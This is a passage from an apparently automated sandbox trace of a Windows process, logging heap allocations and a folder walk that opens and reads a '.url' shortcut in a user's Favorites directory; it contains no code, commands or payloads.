Size=0x60) returned 0x2cb4a00 [0198.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0198.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0198.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0198.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0198.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0198.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0198.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0198.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0198.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0198.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0198.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.602] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.602] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.603] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.603] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.604] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.604] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.604] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.604] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.605] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.605] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.607] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.607] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0198.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0198.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.608] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.608] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.609] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.609] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.609] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.609] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0198.609] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.610] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.610] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.610] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0198.610] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.610] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.610] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.610] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.611] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.611] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.612] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0198.612] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0198.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0198.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.614] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.614] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.614] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0198.614] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.614] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.614] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.614] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.615] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.615] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.615] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.615] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.615] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.616] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.616] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.617] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.617] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.617] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.617] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.618] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.618] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.618] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0198.620] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.620] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0198.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0198.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0198.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0198.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0198.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0198.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.630] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\") returned="Windows Live\\" [0198.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0198.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94e28 [0198.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.631] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\") returned="Favorites\\" [0198.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0198.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94e28 | out: hHeap=0x620000) returned 1 [0198.631] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0198.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0198.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0198.631] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0198.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0198.632] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0198.632] PathFindFileNameW (pszPath="") returned="" [0198.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.632] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\*" (normalized: "c:\\users\\keecfmwgj\\favorites\\windows live\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0198.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.633] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0198.634] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0198.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x2e915e0 [0198.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.634] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Get Windows Live.url") returned=".url" [0198.634] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\windows live\\get windows live.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0198.635] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=133) returned 1 [0198.635] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0198.638] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.638] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0198.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0198.639] HeapFree (in: 